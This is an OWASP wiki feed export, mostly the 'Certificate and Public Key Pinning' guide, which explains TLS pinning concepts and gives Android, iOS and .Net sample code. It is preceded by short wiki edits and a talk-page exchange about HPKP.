=Inactive Projects=&lt;br /&gt;
==Inactive Projects==&lt;br /&gt;
Projects become inactive in those occasions where a project leader is no longer able to manage their project and has not be able to find a suitable replacement for the leader role or when the project leader feels his/her project has become obsolete. The Project Abandonment Process was put in place for such occasions. Under these circumstances, the acting project leader is encourage to submit the Project Abandonment Form. Once a request has been received, the project in question will be archived and labeled as an Inactive project.&lt;br /&gt;
&lt;br /&gt;
=Low Activity Projects=&lt;br /&gt;
==Low Activity Projects==&lt;br /&gt;
Projects might have a recession period of activity, especially after they have reached a certain level of maturity, however the content could be outdated based on the amount of time (6 months/ 1 year) .&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=User_talk:Neil_Smithline&amp;diff=234787</id>
		<title>User talk:Neil Smithline</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=User_talk:Neil_Smithline&amp;diff=234787"/>
				<updated>2017-10-31T15:10:14Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Hi Neil... Saw your updates here https://www.owasp.org/index.php?title=Certificate_and_Public_Key_Pinning&amp;amp;diff=next&amp;amp;oldid=218535. Don't you think is important to highlight this is about HPKP? Pinning for mobile will no be impacted.&lt;br /&gt;
: Thanks Riramar - I missed that the pages were focused on mobile. I removed the comments. What do you think about renaming the pages so that they have the word &amp;quot;mobile&amp;quot; in them somewhere? - Neil Neil Smithline, http://www.neilsmithline.com 10:10, 31 October 2017 (CDT)&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Certificate_and_Public_Key_Pinning&amp;diff=234786</id>
		<title>Certificate and Public Key Pinning</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Certificate_and_Public_Key_Pinning&amp;diff=234786"/>
				<updated>2017-10-31T15:04:39Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: Revert HPKP deprecation message&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
[[Certificate and Public Key Pinning]] is a technical guide to implementing certificate and public key pinning as discussed at the ''[https://www.owasp.org/index.php/Virginia Virginia chapter's]'' presentation [[Media:Securing-Wireless-Channels-in-the-Mobile-Space.ppt|Securing Wireless Channels in the Mobile Space]]. This guide is focused on providing clear, simple, actionable guidance for securing the channel in a hostile environment where actors could be malicious and the conference of trust a liability. Additional presentation material included [[Media:pubkey-pin-supplement.pdf|supplement with code excerpts]], [[Media:pubkey-pin-android.zip|Android sample program]], [[Media:pubkey-pin-ios.zip|iOS sample program]], [[Media:pubkey-pin-dotnet.zip|.Net sample program]], and [[Media:pubkey-pin-openssl.zip|OpenSSL sample program]].&lt;br /&gt;
&lt;br /&gt;
A cheat sheet is available at [[Pinning_Cheat_Sheet|Pinning Cheat Sheet]].&lt;br /&gt;
&lt;br /&gt;
== Introduction == &lt;br /&gt;
&lt;br /&gt;
Secure channels are a cornerstone to users and employees working remotely and on the go. Users and developers expect end-to-end security when sending and receiving data - especially sensitive data on channels protected by VPN, SSL, or TLS. While organizations which control DNS and CA have likely reduced risk to trivial levels under most threat models, users and developers subjugated to other's DNS and a public CA hierarchy are exposed to non-trivial amounts of risk. In fact, history has shown those relying on outside services have suffered chronic breaches in their secure channels.&lt;br /&gt;
&lt;br /&gt;
The pandemic abuse of trust has resulted in users, developers and applications making security related decisions on untrusted input. The situation is somewhat of a paradox: entities such as DNS and CAs are trusted and supposed to supply trusted input; yet their input cannot be trusted. Relying on untrusted input for security related decisions is not only bad karma, it violates a number of secure coding principals (see, for example, OWASP's [[Injection Theory]] and [[Data Validation]]).&lt;br /&gt;
&lt;br /&gt;
Pinning effectively removes the &amp;quot;conference of trust&amp;quot;. An application which pins a certificate or public key no longer needs to depend on others - such as DNS or CAs - when making security decisions relating to a peer's identity. For those familiar with SSH, you should realize that public key pinning is nearly identical to SSH's &amp;lt;tt&amp;gt;StrictHostKeyChecking&amp;lt;/tt&amp;gt; option. SSH had it right the entire time, and the rest of the world is beginning to realize the virtues of directly identifying a host or service by its public key.&lt;br /&gt;
&lt;br /&gt;
Others who actively engage in pinning include Google and its browser Chrome. Chrome was successful in detecting the DigiNotar compromise which uncovered suspected interception by the Iranian government on its citizens. The initial report of the compromise can be found at ''[https://productforums.google.com/d/topic/gmail/3J3r2JqFNTw/discussion Is This MITM Attack to Gmail's SSL?]''; and Google Security's immediate response at ''[https://googleonlinesecurity.blogspot.com/2011/08/update-on-attempted-man-in-middle.html An update on attempted man-in-the-middle attacks]''.&lt;br /&gt;
&lt;br /&gt;
== What's the problem? ==&lt;br /&gt;
&lt;br /&gt;
Users, developers, and applications expect end-to-end security on their secure channels, but some secure channels are not meeting the expectation. Specifically, channels built using well known protocols such as VPN, SSL, and TLS can be vulnerable to a number of attacks.&lt;br /&gt;
&lt;br /&gt;
Examples of past failures are listed on the discussion tab for this article. This cheat sheet does not attempt to catalogue the failures in the industry, investigate the design flaws in the scaffolding, justify the lack of accountability or liability with the providers, explain the race to the bottom in services, or demystify the collusion between, for example, Browsers and CAs. For additional reading, please visit ''[http://www.cs.auckland.ac.nz/~pgut001/pubs/pkitutorial.pdf PKI is Broken]'' and ''[http://blog.cryptographyengineering.com/2012/02/how-to-fix-internet.html The Internet is Broken]''.&lt;br /&gt;
&lt;br /&gt;
=== Patient 0 ===&lt;br /&gt;
&lt;br /&gt;
The original problem was the ''Key Distribution Problem''. Insecure communications can be transformed into a secure communication problem with encryption. Encrypted communications can be transformed into an identity problem with signatures. The identity problem terminates at the key distribution problem. They are the same problem.&lt;br /&gt;
&lt;br /&gt;
=== The Cures ===&lt;br /&gt;
&lt;br /&gt;
There are three cures for the key distribution problem. First is to have first hand knowledge of your partner or peer (i.e., a peer, server or service). This could be solved with SneakerNet. Unfortunately, SneakerNet does not scale and cannot be used to solve the key distribution problem.&lt;br /&gt;
&lt;br /&gt;
The second is to rely on others, and it has two variants: (1) web of trust, and (2) hierarchy of trust. Web of Trust and Hierarchy of Trust solve the key distribution problem in a sterile environment. However, Web of Trust and Hierarchy of Trust each requires us to rely on others - or '''confer trust'''. In practice, trusting others is showing to be problematic.&lt;br /&gt;
&lt;br /&gt;
== What Is Pinning? ==&lt;br /&gt;
&lt;br /&gt;
Pinning is the process of associating a host with their ''expected'' X509 certificate or public key. Once a certificate or public key is known or seen for a host, the certificate or public key is associated or 'pinned' to the host. If more than one certificate or public key is acceptable, then the program holds a ''pinset'' (taking from [https://developers.google.com/events/io/sessions/gooio2012/107/ Jon Larimer and Kenny Root Google I/O talk]). In this case, the advertised identity must match one of the elements in the pinset.&lt;br /&gt;
&lt;br /&gt;
A host or service's certificate or public key can be added to an application at development time, or it can be added upon first encountering the certificate or public key. The former - adding at development time - is preferred since ''preloading'' the certificate or public key ''out of band'' usually means the attacker cannot taint the pin. If the certificate or public key is added upon first encounter, you will be using ''key continuity''. Key continuity can fail if the attacker has a privileged position during the first encounter.&lt;br /&gt;
&lt;br /&gt;
Pinning leverages knowledge of the pre-existing relationship between the user and an organization or service to help make better security related decisions. Because you already have information on the server or service, you don't need to rely on generalized mechanisms meant to solve the ''key distribution'' problem. That is, you don't need to turn to DNS for name/address mappings or CAs for bindings and status. One exception is revocation and it is discussed below in [[#Pinning_Gaps|Pinning Gaps]].&lt;br /&gt;
&lt;br /&gt;
It is also worth mention that Pinning is not Stapling. Stapling sends both the certificate and  OCSP responder information in the same request to avoid the additional fetches the client should perform during path validations.&lt;br /&gt;
&lt;br /&gt;
=== When Do You Pin? ===&lt;br /&gt;
&lt;br /&gt;
You should pin anytime you want to be relatively certain of the remote host's identity or when operating in a hostile environment. Since one or both are almost always true, you should probably pin all the time.&lt;br /&gt;
&lt;br /&gt;
A perfect case in point: during the two weeks or so of preparation for the presentation and cheat sheet, we've observed three relevant and related failures. First was [http://gaurangkp.wordpress.com/2013/01/09/nokia-https-mitm/ Nokia/Opera willfully breaking the secure channel]; second was [http://blog.malwarebytes.org/intelligence/2013/02/digital-certificates-and-malware-a-dangerous-mix/ DigiCert issuing a code signing certificate for malware]; and third was [http://krebsonsecurity.com/2013/02/security-firm-bit9-hacked-used-to-spread-malware/ Bit9's loss of its root signing key]. The environment is not only hostile, it's toxic.&lt;br /&gt;
&lt;br /&gt;
=== When Do You Whitelist? ===&lt;br /&gt;
&lt;br /&gt;
If you are working for an organization which practices &amp;quot;egress filtering&amp;quot; as part of a Data Loss Prevention (DLP) strategy, you will likely encounter ''Interception Proxies''. I like to refer to these things as '''&amp;quot;good&amp;quot; bad guys''' (as opposed to '''&amp;quot;bad&amp;quot; bad guys''') since both break end-to-end security and we can't tell them apart. In this case, '''do not''' offer to whitelist the interception proxy since it defeats your security goals. Add the interception proxy's public key to your pinset after being '''instructed''' to do so by the folks in Risk Acceptance.&lt;br /&gt;
&lt;br /&gt;
Note: if you whitelist a certificate or public key for a different host (for example, to accommodate an interception proxy), you are no longer pinning the expected certificates and keys for the host. Security and integrity on the channel could suffer, and it surely breaks end-to-end security expectations of users and organizations.&lt;br /&gt;
&lt;br /&gt;
For more reading on interception proxies, the additional risk they bestow, and how they fail, see Dr. Matthew Green's ''[http://blog.cryptographyengineering.com/2012/03/how-do-interception-proxies-fail.html How do Interception Proxies fail?]'' and Jeff Jarmoc's BlackHat talk ''[https://www.blackhat.com/html/bh-eu-12/bh-eu-12-archives.html#jarmoc SSL/TLS Interception Proxies and Transitive Trust]''.&lt;br /&gt;
&lt;br /&gt;
=== How Do You Pin? ===&lt;br /&gt;
&lt;br /&gt;
The idea is to re-use the existing protocols and infrastructure, but use them in a hardened manner. For re-use, a program would keep doing the things it used to do when establishing a secure connection.&lt;br /&gt;
&lt;br /&gt;
To harden the channel, the program would take advantage of the &amp;lt;tt&amp;gt;OnConnect&amp;lt;/tt&amp;gt; callback offered by a library, framework or platform. In the callback, the program would verify the remote host's identity by validating its certificate or public key. While pinning does not have to occur in an &amp;lt;tt&amp;gt;OnConnect&amp;lt;/tt&amp;gt; callback, its often most convenient because the underlying connection information is readily available.&lt;br /&gt;
&lt;br /&gt;
== What Should Be Pinned? ==&lt;br /&gt;
&lt;br /&gt;
The first thing to decide is what should be pinned. For this choice, you have two options: you can (1) pin  the certificate; or (2) pin the public key. If you choose public keys, you have two additional choices: (a) pin the &amp;lt;tt&amp;gt;subjectPublicKeyInfo&amp;lt;/tt&amp;gt;; or (b) pin one of the concrete types such as &amp;lt;tt&amp;gt;RSAPublicKey&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;DSAPublicKey&amp;lt;/tt&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
The three choices are explained below in more detail. I would encourage you to pin the &amp;lt;tt&amp;gt;subjectPublicKeyInfo&amp;lt;/tt&amp;gt; because it has the public parameters (such as &amp;lt;tt&amp;gt;{e,n}&amp;lt;/tt&amp;gt; for an RSA public key) '''and''' contextual information such as an algorithm and OID. The context will help you keep your bearings at times, and Figure 1 below shows the additional information available.&lt;br /&gt;
&lt;br /&gt;
=== Encodings/Formats ===&lt;br /&gt;
&lt;br /&gt;
For the purposes of this article, the objects are in X509-compatible presentation format (PKCS#1 defers to X509, both of which use ASN.1). If you have a PEM encoded object (for example, &amp;lt;tt&amp;gt;-----BEGIN CERTIFICATE-----&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;-----END CERTIFICATE-----&amp;lt;/tt&amp;gt;), then convert the object to DER encoding. Conversion using OpenSSL is offered below in [[#Format_Conversions|Format Conversions]].&lt;br /&gt;
&lt;br /&gt;
A certificate is an object which binds an entity (such as a person or organization) to a public key via a signature. The certificate is DER encoded, and has associated data or attributes such as ''Subject'' (who is identified or bound), ''Issuer'' (who signed it), ''Validity'' (''NotBefore'' and ''NotAfter''), and a ''Public Key''.&lt;br /&gt;
&lt;br /&gt;
A certificate has a ''subjectPublicKeyInfo''. The subjectPublicKeyInfo is a key with additional information. The ASN.1 type includes an ''Algorithm ID'', a ''Version'', and an extensible format to hold a concrete public key. Figures 1 and 2 below show different views of the same RSA key, which is the subjectPublicKeyInfo. The key is for the site [https://www.random.org random.org], and it is used in the sample programs and listings below.&lt;br /&gt;
&lt;br /&gt;
{| align=&amp;quot;center&amp;quot;&lt;br /&gt;
| [[File:random-org-der-dump.png|thumb|375px|Figure 1: subjectPublicKeyInfo dumped with dumpans1]]&lt;br /&gt;
| [[File:random-org-der-hex.png|thumb|375px|Figure 2: subjectPublicKeyInfo under a hex editor]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
The concrete public key is an encoded public key. The key format will usually be specified elsewhere - for example, PKCS#1 in the case of RSA Public Keys. In the case of an RSA public key, the type is ''RSAPublicKey'' and the parameters &amp;lt;tt&amp;gt;{e,n}&amp;lt;/tt&amp;gt; will be ASN.1 encoded. Figures 1 and 2 above clearly show the modulus (''n'' at line 28) and exponent (''e'' at line 289). For DSA, the concrete type is DSAPublicKey and the ASN.1 encoded parameters would be &amp;lt;tt&amp;gt;{p,q,g,y}&amp;lt;/tt&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Final takeaways: (1) a certificate binds an entity to a public key; (2) a certificate has a subjectPublicKeyInfo; and (3) a subjectPublicKeyInfo has an concrete public key. For those who want to learn more, a more in-depth discussion from a programmer's perspective can be found at the Code Project's article ''[http://www.codeproject.com/Articles/25487/Cryptographic-Interoperability-Keys Cryptographic Interoperability: Keys]''.&lt;br /&gt;
&lt;br /&gt;
=== Certificate ===&lt;br /&gt;
&lt;br /&gt;
[[File:pin-cert.png|thumb|right|100px|Certificate]] The certificate is easiest to pin. You can fetch the certificate out of band for the website, have the IT folks email your company certificate to you, use &amp;lt;tt&amp;gt;openssl s_client&amp;lt;/tt&amp;gt; to retrieve the certificate etc. When the certificate expires, you would update your application. Assuming your application has no bugs or security defects, the application would be updated every year or two.&lt;br /&gt;
&lt;br /&gt;
At runtime, you retrieve the website or server's certificate in the callback. Within the callback, you compare the retrieved certificate with the certificate embedded within the program. If the comparison fails, then fail the method or function. &lt;br /&gt;
&lt;br /&gt;
There is a downside to pinning a certificate. If the site rotates its certificate on a regular basis, then your application would need to be updated regularly. For example, Google rotates its certificates, so you will need to update your application about once a month (if it depended on Google services). Even though Google rotates its certificates, the underlying public keys (within the certificate) remain static.&lt;br /&gt;
&lt;br /&gt;
=== Public Key ===&lt;br /&gt;
&lt;br /&gt;
[[File:pin-pubkey.png|thumb|right|100px|Public Key]] Public key pinning is more flexible but a little trickier due to the extra steps necessary to extract the public key from a certificate. As with a certificate, the program checks the extracted public key with its embedded copy of the public key.&lt;br /&gt;
&lt;br /&gt;
There are two downsides two public key pinning. First, its harder to work with keys (versus certificates) since you usually must extract the key from the certificate. Extraction is a minor inconvenience in Java and .Net, buts its uncomfortable in Cocoa/CocoaTouch and OpenSSL. Second, the key is static and may violate key rotation policies.&lt;br /&gt;
&lt;br /&gt;
=== Hashing ===&lt;br /&gt;
&lt;br /&gt;
While the three choices above used DER encoding, its also acceptable to use a hash of the information (or other transforms). In fact, the original sample programs were written using digested certificates and public keys. The samples were changed to allow a programmer to inspect the objects with tools like &amp;lt;tt&amp;gt;dumpasn1&amp;lt;/tt&amp;gt; and other ASN.1 decoders.&lt;br /&gt;
&lt;br /&gt;
Hashing also provides three additional benefits. First, hashing allows you to anonymize a certificate or public key. This might be important if you application is concerned about leaking information during decompilation and re-engineering.&lt;br /&gt;
&lt;br /&gt;
Second, a digested certificate fingerprint is often available as a native API for many libraries, so its convenient to use.&lt;br /&gt;
&lt;br /&gt;
Finally, an organization might want to supply a reserve (or back-up) identity in case the primary identity is compromised. Hashing ensures your adversaries do not see the reserved certificate or public key in advance of its use. In fact, Google's IETF draft ''websec-key-pinning'' uses the technique.&lt;br /&gt;
&lt;br /&gt;
== What About X509? ==&lt;br /&gt;
&lt;br /&gt;
PKI{X} and the Internet form an intersection. What Internet users expect and what they receive from CAs could vary wildly. For example, an Internet user has security goals, while a CA has revenue goals and legal goals. Many are surprised to learn that the user is often required to perform host identity verification even though the CA issued the certificate (the details are buried in CA warranties on their certificates and their Certification Practice Statement (CPS)).&lt;br /&gt;
&lt;br /&gt;
There are a number of PKI profiles available. For the Internet, &amp;quot;Internet X.509 Public Key Infrastructure Certificate and Certificate Revocation List (CRL)&amp;quot;, also known as [http://tools.ietf.org/rfc/rfc5280.txt RFC 5280], is of interest. Since a certificate is specified in the ITU's X509 standard, there are lots of mandatory and optional fields available for validation from both bodies. Because of the disjoint goals among groups, the next section provides guidance.&lt;br /&gt;
&lt;br /&gt;
=== Mandatory Checks ===&lt;br /&gt;
&lt;br /&gt;
All X509 verifications must include:&lt;br /&gt;
&lt;br /&gt;
* A path validation check. The check verifies all the signatures on certificates in the chain are valid under a given PKI. The check begins at the server or service's certificate (the leaf), and proceeds back to a trusted root certificate (the root).&lt;br /&gt;
&lt;br /&gt;
* A validity check, or the &amp;lt;tt&amp;gt;notBefore&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;notAfter&amp;lt;/tt&amp;gt; fields. The &amp;lt;tt&amp;gt;notAfter&amp;lt;/tt&amp;gt; field is especially important since a CA will not warrant the certificate after the date, and it does not have to provide CRL/OCSP updates after the date.&lt;br /&gt;
&lt;br /&gt;
* Revocation status. As with &amp;lt;tt&amp;gt;notAfter&amp;lt;/tt&amp;gt;, revocation is important because the CA will not warrant a certificate once it is listed as revoked. The IETF approved way of checking a certificate's revocation is OCSP and specified in [http://tools.ietf.org/rfc/rfc2560.txt RFC 2560].&lt;br /&gt;
&lt;br /&gt;
=== Optional Checks ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;[Mulling over what else to present, and the best way to present it. Subject name? DNS lookups? Key Usage? Algorithms? Geolocation based on IP? Check back soon.]&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
In the model which pre-dated PKIX RFC-5280, X.509v1 there was strong binding of the certificate Subject name to the X.500 Directory.  With the update to X.509v3, the Directory is  still the standard for authentication of caCertificate attributes, versus accepting a self signed root. Geo-location is important, the fake certificate for Google was given a location of Florida, instead of Mountain View, CA. The binding of the certificate to the Directory can anchor the root caCertificate, in effect &amp;quot;pin&amp;quot; it, to a valid entity that can have demonstrable attributes such as location.  This is detailed in RFC-1255.  Additional fields specified, such as the subject alternative field, for example a RFC-822 email address, or DNS name, can be located in the DNS, but the actual heavy lifting is done by the X.500 Directory, which is used currently as a cross-certificate trust conduit at the Federal Bridge between major communities of interest, that are not Internet focused. While those cross-certificates are valuable in validation between trust communities, a self-signed root, still needs to be either pinned, curated in trust bundle such as in  web browser software secure storage or represented by a federated community. The Directory can play a role to fill in gaps to validate caCertificates, either locally, or nationally under an administrative domain such as c=US. By divorcing the subject from the Directory entry, problems begin to arise in which pinning plays a key role to ensure that client and server have the same reference points.&lt;br /&gt;
&lt;br /&gt;
=== Public Key Checks ===&lt;br /&gt;
&lt;br /&gt;
''Quod vide'' (''q.v.''). Verifying the identity of a host with knowledge of its associated/expected public key is pinning.&lt;br /&gt;
&lt;br /&gt;
== Examples of Pinning ==&lt;br /&gt;
&lt;br /&gt;
This section demonstrates certificate and public key pinning in Android Java, iOS, .Net, and OpenSSL. All programs attempt to connect to [https://www.random.org random.org] and fetch bytes (Dr. Mads Haahr participates in AOSP's pinning program, so the site should have a static key). The programs enjoy a pre-existing relationship with the site (more correctly, ''a priori'' knowledge), so they include a copy of the site's public key and pin the identity on the key.&lt;br /&gt;
&lt;br /&gt;
Parameter validation, return value checking, and error checking have been omitted in the code below, but is present in the sample programs. So the sample code is ready for copy/paste. By far, the most uncomfortable languages are C-based: iOS and OpenSSL.&lt;br /&gt;
&lt;br /&gt;
===HTTP pinning===&lt;br /&gt;
[http://www.rfc-editor.org/rfc/rfc7469.txt RFC 7469] introduced a new HTTP header that allows SSL servers to declare hashes of their certificates with time scope in which these certificates should not be changed. For example:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;&lt;br /&gt;
       Public-Key-Pins: max-age=2592000;&lt;br /&gt;
       pin-sha256=&amp;quot;E9CZ9INDbd+2eRQozYqqbQ2yXLVKB9+xcprMF+44U1g=&amp;quot;;&lt;br /&gt;
       pin-sha256=&amp;quot;LPJNul+wow4m6DsqxbninhsWHlwfp0JecwQzYpOLmCQ=&amp;quot;;&lt;br /&gt;
       report-uri=&amp;quot;http://example.com/pkp-report&amp;quot;&lt;br /&gt;
&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Please note that [http://www.rfc-editor.org/rfc/rfc7469.txt RFC 7469] is controversial since it allows overrides for locally installed authorities. That is, it allows an adversary or other party who successfully phishes the user to override a known good pinset with non-authentic or fraudulent information. Second, the reporting mechanism is suppressed from broken pinsets, so a complying user agent will be complicit in the cover up after the fact. That is, the reporting of the broken pinset is called out as '''MUST NOT''' report [https://en.wikipedia.org/w/index.php?title=HTTP_Public_Key_Pinning [1]].&lt;br /&gt;
&lt;br /&gt;
=== Android ===&lt;br /&gt;
&lt;br /&gt;
This example is using the concept from [https://developer.android.com/training/articles/security-ssl.html#UnknownCa developer.android.com unknown CA implementation document].&amp;lt;br&amp;gt;&lt;br /&gt;
Basically you can teach HttpsURLConnection to trust a specific set of CAs.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
public class KeyPinStore {&lt;br /&gt;
&lt;br /&gt;
    private static KeyPinStore instance = null;&lt;br /&gt;
    private SSLContext sslContext = SSLContext.getInstance(&amp;quot;TLS&amp;quot;);&lt;br /&gt;
&lt;br /&gt;
    public static synchronized KeyPinStore getInstance() throws CertificateException, IOException, KeyStoreException, NoSuchAlgorithmException, KeyManagementException{&lt;br /&gt;
        if (instance == null){&lt;br /&gt;
            instance = new KeyPinStore();&lt;br /&gt;
        }&lt;br /&gt;
        return instance;&lt;br /&gt;
    }&lt;br /&gt;
&lt;br /&gt;
    private KeyPinStore() throws CertificateException, IOException, KeyStoreException, NoSuchAlgorithmException, KeyManagementException{&lt;br /&gt;
        // Load CAs from an InputStream&lt;br /&gt;
        // (could be from a resource or ByteArrayInputStream or ...)&lt;br /&gt;
        CertificateFactory cf = CertificateFactory.getInstance(&amp;quot;X.509&amp;quot;);&lt;br /&gt;
        // randomCA.crt should be in the Assets directory&lt;br /&gt;
        InputStream caInput = new BufferedInputStream(MainActivity.context.getAssets().open(&amp;quot;randomCA.crt&amp;quot;));&lt;br /&gt;
        Certificate ca;&lt;br /&gt;
        try {&lt;br /&gt;
            ca = cf.generateCertificate(caInput);&lt;br /&gt;
            System.out.println(&amp;quot;ca=&amp;quot; + ((X509Certificate) ca).getSubjectDN());&lt;br /&gt;
        } finally {&lt;br /&gt;
            caInput.close();&lt;br /&gt;
        }&lt;br /&gt;
&lt;br /&gt;
        // Create a KeyStore containing our trusted CAs&lt;br /&gt;
        String keyStoreType = KeyStore.getDefaultType();&lt;br /&gt;
        KeyStore keyStore = KeyStore.getInstance(keyStoreType);&lt;br /&gt;
        keyStore.load(null, null);&lt;br /&gt;
        keyStore.setCertificateEntry(&amp;quot;ca&amp;quot;, ca);&lt;br /&gt;
&lt;br /&gt;
        // Create a TrustManager that trusts the CAs in our KeyStore&lt;br /&gt;
        String tmfAlgorithm = TrustManagerFactory.getDefaultAlgorithm();&lt;br /&gt;
        TrustManagerFactory tmf = TrustManagerFactory.getInstance(tmfAlgorithm);&lt;br /&gt;
        tmf.init(keyStore);&lt;br /&gt;
&lt;br /&gt;
        // Create an SSLContext that uses our TrustManager&lt;br /&gt;
        // SSLContext context = SSLContext.getInstance(&amp;quot;TLS&amp;quot;);&lt;br /&gt;
        sslContext.init(null, tmf.getTrustManagers(), null);&lt;br /&gt;
    }&lt;br /&gt;
&lt;br /&gt;
    public SSLContext getContext(){&lt;br /&gt;
        return sslContext;&lt;br /&gt;
    }&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
You can check this [https://github.com/riramar/pubkey-pin-android Android app pubkey-pin-android] on Github as full example.&lt;br /&gt;
&lt;br /&gt;
=== iOS ===&lt;br /&gt;
&lt;br /&gt;
An open-source SSL pinning library for iOS and OS X was released at Black Hat 2015, which provides an easy-to-use API for deploying pinning within an App: https://github.com/datatheorem/TrustKit .&lt;br /&gt;
&lt;br /&gt;
Otherwise and when using NSURLConnection, iOS pinning is performed through a &amp;lt;tt&amp;gt;NSURLConnectionDelegate&amp;lt;/tt&amp;gt;. The delegate must implement &amp;lt;tt&amp;gt;connection:canAuthenticateAgainstProtectionSpace:&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;connection:didReceiveAuthenticationChallenge:&amp;lt;/tt&amp;gt;. Within &amp;lt;tt&amp;gt;connection:didReceiveAuthenticationChallenge:&amp;lt;/tt&amp;gt;, the delegate must call &amp;lt;tt&amp;gt;SecTrustEvaluate&amp;lt;/tt&amp;gt; to perform customary X509 checks.&lt;br /&gt;
&lt;br /&gt;
Download: [[Media:pubkey-pin-ios.zip|iOS sample program]].&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;-(IBAction)fetchButtonTapped:(id)sender&lt;br /&gt;
{&lt;br /&gt;
    NSString* requestString = @&amp;quot;https://www.random.org/integers/?&lt;br /&gt;
        num=16&amp;amp;min=0&amp;amp;max=255&amp;amp;col=16&amp;amp;base=16&amp;amp;format=plain&amp;amp;rnd=new&amp;quot;;&lt;br /&gt;
    NSURL* requestUrl = [NSURL URLWithString:requestString];&lt;br /&gt;
&lt;br /&gt;
    NSURLRequest* request = [NSURLRequest requestWithURL:requestUrl&lt;br /&gt;
                                             cachePolicy:NSURLRequestReloadIgnoringLocalCacheData&lt;br /&gt;
                                         timeoutInterval:10.0f];&lt;br /&gt;
&lt;br /&gt;
    NSURLConnection* connection = [[NSURLConnection alloc] initWithRequest:request delegate:self];&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
-(BOOL)connection:(NSURLConnection *)connection canAuthenticateAgainstProtectionSpace:&lt;br /&gt;
                  (NSURLProtectionSpace*)space&lt;br /&gt;
{&lt;br /&gt;
    return [[space authenticationMethod] isEqualToString: NSURLAuthenticationMethodServerTrust];&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
- (void)connection:(NSURLConnection *)connection didReceiveAuthenticationChallenge:&lt;br /&gt;
                   (NSURLAuthenticationChallenge *)challenge&lt;br /&gt;
{&lt;br /&gt;
  if ([[[challenge protectionSpace] authenticationMethod] isEqualToString: NSURLAuthenticationMethodServerTrust])&lt;br /&gt;
  {&lt;br /&gt;
    do&lt;br /&gt;
    {&lt;br /&gt;
      SecTrustRef serverTrust = [[challenge protectionSpace] serverTrust];&lt;br /&gt;
      if(nil == serverTrust)&lt;br /&gt;
        break; /* failed */&lt;br /&gt;
&lt;br /&gt;
      OSStatus status = SecTrustEvaluate(serverTrust, NULL);&lt;br /&gt;
      if(!(errSecSuccess == status))&lt;br /&gt;
        break; /* failed */&lt;br /&gt;
&lt;br /&gt;
      SecCertificateRef serverCertificate = SecTrustGetCertificateAtIndex(serverTrust, 0);&lt;br /&gt;
      if(nil == serverCertificate)&lt;br /&gt;
        break; /* failed */&lt;br /&gt;
&lt;br /&gt;
      CFDataRef serverCertificateData = SecCertificateCopyData(serverCertificate);&lt;br /&gt;
      [(id)serverCertificateData autorelease];&lt;br /&gt;
      if(nil == serverCertificateData)&lt;br /&gt;
        break; /* failed */&lt;br /&gt;
&lt;br /&gt;
      const UInt8* const data = CFDataGetBytePtr(serverCertificateData);&lt;br /&gt;
      const CFIndex size = CFDataGetLength(serverCertificateData);&lt;br /&gt;
      NSData* cert1 = [NSData dataWithBytes:data length:(NSUInteger)size];&lt;br /&gt;
&lt;br /&gt;
      NSString *file = [[NSBundle mainBundle] pathForResource:@&amp;quot;random-org&amp;quot; ofType:@&amp;quot;der&amp;quot;];&lt;br /&gt;
      NSData* cert2 = [NSData dataWithContentsOfFile:file];&lt;br /&gt;
&lt;br /&gt;
      if(nil == cert1 || nil == cert2)&lt;br /&gt;
        break; /* failed */&lt;br /&gt;
&lt;br /&gt;
      const BOOL equal = [cert1 isEqualToData:cert2];&lt;br /&gt;
      if(!equal)&lt;br /&gt;
        break; /* failed */&lt;br /&gt;
&lt;br /&gt;
      // The only good exit point&lt;br /&gt;
      return [[challenge sender] useCredential: [NSURLCredential credentialForTrust: serverTrust]&lt;br /&gt;
                    forAuthenticationChallenge: challenge];&lt;br /&gt;
    } while(0);&lt;br /&gt;
&lt;br /&gt;
    // Bad dog&lt;br /&gt;
    return [[challenge sender] cancelAuthenticationChallenge: challenge];&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== .Net ===&lt;br /&gt;
&lt;br /&gt;
.Net pinning can be achieved by using &amp;lt;tt&amp;gt;ServicePointManager&amp;lt;/tt&amp;gt; as shown below.&lt;br /&gt;
&lt;br /&gt;
Download: [[Media:pubkey-pin-dotnet.zip|.Net sample program]].&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;// Encoded RSAPublicKey&lt;br /&gt;
private static String PUB_KEY = &amp;quot;30818902818100C4A06B7B52F8D17DC1CCB47362&amp;quot; +&lt;br /&gt;
    &amp;quot;C64AB799AAE19E245A7559E9CEEC7D8AA4DF07CB0B21FDFD763C63A313A668FE9D764E&amp;quot; +&lt;br /&gt;
    &amp;quot;D913C51A676788DB62AF624F422C2F112C1316922AA5D37823CD9F43D1FC54513D14B2&amp;quot; +&lt;br /&gt;
